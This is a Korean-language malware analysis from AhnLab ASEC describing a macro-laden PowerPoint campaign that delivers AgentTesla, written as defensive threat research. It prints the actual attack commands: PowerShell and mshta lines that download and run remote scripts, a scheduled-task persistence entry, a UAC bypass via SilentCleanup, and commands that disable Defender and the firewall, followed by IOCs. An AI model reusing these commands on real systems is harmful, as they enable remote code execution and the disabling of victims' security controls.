# 더욱 정교해진 악성 PPT 를 통해 AgentTesla 유포 중 **asec.ahnlab.com/ko/29133/** 2021년 12월 2일 ASEC 분석팀은 작년부터 꾸준하게 유포되고 있는 악성 PPT 파일에 대해 소개해왔다. 최근에 는 악성 PPT 파일에서 실행되는 스크립트에 다양한 악성 기능이 추가 된 것을 확인하였다. 악 성 PPT 파일이 실행되는 방식은 기존에 소개해왔던 방식과 동일하며, 악성 스크립트에 의해 추가 악성코드 실행, Anti-AV, UAC bypass 등의 기능을 수행한다. PPT 파일 실행시, 아래와 같이 기존과 동일하게 매크로 포함 여부를 선택하는 알림창이 생성 된다. 이때 매크로 포함 버튼을 선택하게 되면 악성 매크로가 자동으로 실행되게 된다. ----- 매크로 포함 여부 알림 악성 매크로가 실행되면 파워 포인트 에러를 위장한 오류창을 생성하여 사용자가 악성 행위를 알아차리기 힘들도록 하였다. 오류창 위장 악성 매크로는 Auto_Open() 함수에 의해 자동으로 실행되는 형태로, 악성 행위에 사용되는 데 이터는 난독화되어 있다. 난독화 해제시 아래와 같은 문자열을 확인할 수 있으며, shell 함수를 통해 악성 명령어가 실행된다. ----- 난독화 해제 후 문자열 악성 매크로에 의해 실행되는 악성 명령어는 아래와 같으며, 기존과 동일하게 mshta 프로세스 를 통해 악성 url 에 접근하여 추가 스크립트를 실행하게 된다. 악성 명령어 “c:\windows\system32\calc\..\mshta” “hxxps://hahahahh@j.mp/rendomchrsadowkaduaowidk” **Final URL** hxxps://download2389.mediafire.com/f68ak6xluypg/t1qm2d4ahq43wn3/2.doc 해당 사이트에는 악성 vbscript 가 존재하며, 총 3개의 행위를 수행한다. 먼저, 런키에 파워쉘 명령어를 저장 후 해당 명령어를 실행한다. 레지스트리 경로와 파워쉘 명령어는 아래와 같다. 파워쉘 명령어는 두 개의 url 에 접속하여 추가 스크립트를 실행하게 된다. 추가 스크립트는 vbscript 이후 설명되어 있다. 레지스트리 경로 HKEY_CURRENT_USER\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run:cwdfwiiuyqw 파워쉘 명령어 ----- pOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command i’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/p1/2.txt’) useB);i’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/fin/c2.txt’) -useB); vbscript (1) 이후 Shellexecute 를 통해 작업 스케줄러 등록 명령어를 실행하며, 명령어는 아래와 같다. 작 업 스케줄러에 등록되는 명령어는 mshta 를 통해 악성 url 에 접속하는 기능으로 63분마다 해 당 명령어가 반복된다. 현재 해당 url 은 접속이 불가능하다. 작업 스케줄러 등록 schtasks /create /sc MINUTE /mo 63 /tn kwdwdwfdfabvco /F /tr MsHtA hxxp://kukadunikkk@bakuzamokxxxala.duckdns.org/b1/2.txt open vbscript (2) 마지막으로, 런키에 악성 mshta 명령어를 저장한다. 레지스트리 경로와 명령어는 아래와 같 다. 해당 명령어는 런키에 등록되어 재부팅시 자동으로 실행되도록 하며 현재 해당 url 은 접속 이 불가능하다. 레지스트 경로 HKEY_CURRENT_USER\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run:pilodkis **mshta 명령어** MsHTa hxxp://www.starinxxxgkular.duckdns.org/s1/2.txt ----- vbscirpt (3) 앞에서 언급한 vbscript 에서 실행되는 파워쉘 명령어는 두 개의 url 에 접속을 시도하며, 각 url 에는 다른 기능을 수행하는 악성 파워쉘 명령어가 존재한다. 파워쉘 명령어는 각각 악성코드 실행 및 anti-av, uac bypass 등의 기능을 수행한다. 먼저 첫번째 url 에서 실행되는 파워쉘 명 령어는 악성 닷넷 실행 파일을 로드하는 기능을 수행한다. 로드되는 바이너리는 아래와 같은 형태로 존재하며, gzip 을 통해 압축 해제되어 실행된다. 인코딩된 악성 바이너리 위와 같은 형태로 총 2개의 바이너리가 존재하는데, 하나는 악성 행위를 수행하는 payload 이 며 나머지 하나는 payload 를 정상 프로세스에 인젝션하는 기능을 수행한다. 아래 명령어를 통 해 악성 바이너리가 로드되며, 디코딩된 첫번째 닷넷 파일의 projFUD.alosh_rat 의 Execute 메 소드를 실행하는 것을 확인할 수 있다. 또한 “C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe” 경로와 디코딩된 두번째 닷넷 파일을 인자로 실행한다. 악성 바이너리 로드 ----- 실행되는 Execute 메소드는 아래와 같으며, aspnet_compiler.exe 프로세스를 생성 후 두번째 닷넷 파일을 인젝션하여 악성 행위를 수행한다. 이때 인젝션되는 파일은 정보유출형 악성코드 인 AgentTesla 로 확인되었다. 두번째 url 에서 실행되는 파워쉘 명령어는 백신 프로그램 검사 및 권한 상승 등 다양한 기능을 수행한다. 아래와 같이 특정 경로에 백신 프로그램이 존재하는 경우, “C:\Users\Public\commander.vbs” 파일을 생성하며 윈도우 시작 폴더에 복사 후 실행한다. commander.vbs 파일은 파워쉘 명령어를 통해 “C:\Users\Public\Comola.ps1” 파일을 실행하 는 기능을 수행한다. 백신 프로그램 검사 Comola.ps1 파일은 [http://www.google.com 에](http://www.google.com/) 접속하여 다운로드되는 정상 스크립트로, 백신 제품이 존재하는 경우 악성 행위가 실행되지 않도록 한다. Comola.ps1 파일 생성 검사 대상 백신 프로그램의 경로는 아래와 같다. – C:\Program Files\ESET\ESET Security\ecmds.exe – C:\Program Files\Avast Software\Avast\AvastUI.exe – C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe ----- – C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe – C:\Program Files\AVG\Antivirus\AVGUI.exe 백신 프로그램이 존재하지 않는 경우, 아래와 같은 악성 행위가 수행된다. 다수의 스크립트 파 일이 생성되며 각 파일에 대한 설명은 아래와 같다. **1. C:\Users\Public\cooki.ps1** 해당 파일은 특정 레지스트리 값을 변경하는 파워쉘 명령어가 포함되어 있으며, 레지스트리 값을 변경하여 윈도우 보안 알림 메시지 창을 비활성화하게 된다. 변경되는 레지스트리 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.101] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{088E8DFB-2464-4C21-BAD2-F0AA6DB5D4BC}.check.0] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}.check.101] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{134EA407-755D-4A93-B8A6-F290CD155023}.check.8001] 외 다 수 레지스트리 변경 **2. C:\Users\Public\Cola.ps1** 해당 파일은 UAC bypass 기능을 수행한다. SID 를 검사하여 관리자일 경우, “C:\Users\Public\common.vbs” 파일을 실행한다. 관리자가 아닐 경우, 윈도우 서비스인 SilentCleanup 작업을 이용하여 권한을 상승한다. SilentCleanup 서비스는 실행시 자동으로 상승된 권한으로 실행되며 %windir%\system32\cleanmgr.exe 파일을 실행한다. 이때 환경 변 수 %windir% 를 조작하여 원하는 명령어를 상승된 권한으로 실행시킬 수 있다. 해당 파일에서 는 환경변수를 아래와 같이 변경 후 SilentCleanup 서비스를 시작한다. 환경변수 변경 powershell -ep bypass -w h $PSCommandPath; ----- UAC Bypass **3. C:\Users\Public\Tackel.ps1** 해당 파일은 윈도우 디펜더를 비활성화하는 기능을 수행한다. 특정 경로 및 프로세스를 윈도 우 디펜더 예외 경로로 설정하며, AgentTesla 가 인젝션되는 aspnet_compiler.exe 프로세스 및 악성 행위에 사용되는 프로세스가 포함되어 있다. 또한 호스트 파일 변경 및 .NET Framework 3.5 기능 파일 설치를 수행한다. 윈도우 디펜더 예외 경로 및 프로세스 C:\ D:\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\ C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe C:\Windows\System32\kernel32.dll explorer.exe aspnet_compiler.exe Mshta.exe powershell.exe 외 다수 윈도우 디펜더 비활성화 New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 Set-MpPreference -PUAProtection disable Set-MpPreference -HighThreatDefaultAction 6 Set-MpPreference -ModerateThreatDefaultAction 6 Set-MpPreference -LowThreatDefaultAction 6 Set-MpPreference -SevereThreatDefaultAction 6 Set-MpPreference -ScanScheduleDay 8 netsh advfirewall set allprofiles state off 호스트 파일 변경 n66.254.114.41 virusscan.jotti.org ----- 윈도우 디펜더 비활성화, 호스트 파일 변경, 닷넷 프레임워크 설치 **4. C:\Users\Public\common.vbs** 해당 파일은 Tackel.ps1, cooki.ps1 파일을 실행한다. **5. C:\Users\Public\Chrome.vbs** 해당 파일은 Cola.ps1 파일을 실행한다. 최종적으로 Chrome.vbs 파일이 실행된다. 이후 추가 파일들이 순차적으로 실행되어 백신 프 로그램 검사 및 UAC Bypass, 윈도우 디펜더 비활성화 등 추가 악성 코드의 실행을 위한 환경 을 설정하게 된다. 악성 PPT 파일은 작년부터 꾸준하게 변형되고 있으며 다양한 악성 기능이 추가되어 유포되고 있다. 사용자들은 출처가 불분명한 파일의 열람은 자제해야하며, 문서에 포함된 의심 매크로 는 실행하지 않도록 해야 한다. **[파일진단]** Downloader/PPT.Generic Trojan/VBS.Runner Trojan/PowerShell.Bypass Trojan/PowerShell.Disabler **[행위** 진단] Execution/MDP.Mshta.M3546 ----- **[IOC 정보]** eceb63e68b9c3ea9d55e1a6cb1e25d5d 35b2343da6d21a5cede2751026be78f8 a6fd5561622b8c942aa40a97a4baece8 61cc1dac681dfcbcd8781a498684d434 79106a7027e6bf3aff964ccf694d99fb 199afc572f448386b8a72f872b64778c 8e7581085b48c219c5fafdf0868a644b hxxps://download2389.mediafire.com/f68ak6xluypg/t1qm2d4ahq43wn3/2.doc hxxp://www.minpowpoin.duckdns.org/p1/2.txt hxxp://www.minpowpoin.duckdns.org/fin/c2.txt hxxp://kukadunikkk@bakuzamokxxxala.duckdns.org/b1/2.txt hxxp://www.starinxxxgkular.duckdns.org/s1/2.txt **[기존** 악성 PPT 관련 블로그] ----- Outlook.exe 를 이용한 악성 PPT 매크로 유포 중 – ASEC BLOG 최근 ASEC 분석팀은 꾸준하게 유포되고 있는 악성 PPT 파일의 변형을 확인하였다. 기존과 동일하게 mshta.exe 를 이용하여 악성 스크립트를 실행하는 동작 방식으로, 중간 과정에서 outlook.exe 프로세스를 이용하는 방식이 추가되었다. 악성 PPT 파일은 아래와 같이 피싱 메 일의 첨부 파일을 통해 유포되고 있으며, 구매 문의와 관련된 내용을 포함하고 있다. 또한 이전 유형과 동일하게 악성 PPT 파일은 PDF 확장자로 위장한 것을 확인할 수 있다. 유포 파일명 Purchase Inquiry_pdf.ppt 악성 PPT 파… 지속적으로 유포되는 파워포인트 유형의 악성 첨부파일 – ASEC BLOG 지난 4월, 아래의 포스팅을 통해 PPT파일을 매개체로 하여 유포되는 악성코드에 대해 소개한 바 있다. ASEC 분석팀은 파워포인트 유형의 PPAM 파일을 이용한 악성 행위가 최근까지도 지 속되는 것을 확인하여 이를 알리려 한다. 4월에 소개한 내용은 파워포인트에 포함된 매크로가 ----- 실행되면 mshta.exe를 이용하여 악성 스크립트가 삽입된 blogspot 웹페이지의 소스가 공격에 바로 사용되었으나, 이번에는 powershell.exe/wscript.exe를 이용한 프로세스가 추가되어 보 다 더 복잡해진 것이 특징이라고 할 수 있다. V… 피싱메일에 첨부된 PPT 파일을 통해 유포되는 AgentTesla !! – ASEC BLOG ASEC 분석팀은 피싱메일에 악성 파워포인트(*.PPT) 파일이 첨부되어 유포중인 것을 확인하 였다. 악성코드가 유포되고 동작하는 방식은 ASEC 블로그를 통해 지속적으로 소개해왔던 방 식에서 크게 벗어나지 않으며, 기존에 사용했던 방법들을 조합한 것이 특징이라고 할 수 있다. 지난 2020년 7월에 ASEC블로그에 소개한 내용(‘AgentTesla 악성코드 국내에 어떻게 유포되 고 있나?’)은 공격자가 Pastebin 서비스를 사용하여 AgentTesla 를 유포한 것이며, 11월에 소 개한 내용(‘국세청 ‘전자세금계산서’ 사칭한 Lok… AgentTesla 악성코드 국내에 어떻게 유포되고 있나? – ASEC BLOG ----- 올해 초부터 피싱 메일에 악성 파워포인트( .PPT) 파일이 첨부되어 유포중인 사례가 확인되고 있다. ASEC 분석팀에서는 최근 이러한 공격 방식을 통해 AgentTesla가 최종 실행된 것을 포 착하여 이에 대해 알리려한다. 해외에서는 아래 블로그처럼 해외에서도 올 1월 정보유출형 악 성코드 azorult가 메일에 첨부된 PPT를 통해 유포되었다. (해외 블로그 : https://appriver.com/resources/blog/january-2020/powerpoint-malware-references-drakelyrics-dro… 연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구 독 서비스를 통해 확인 가능하다. [Categories:악성코드](https://asec.ahnlab.com/ko/category/malware/) 정보 [Tagged as:AGENTTESLA,](https://asec.ahnlab.com/ko/tag/agenttesla/) [PPT악성코드,](https://asec.ahnlab.com/tag/ppt%ec%95%85%ec%84%b1%ec%bd%94%eb%93%9c/) [VBA매크로](https://asec.ahnlab.com/tag/vba%eb%a7%a4%ed%81%ac%eb%a1%9c/) -----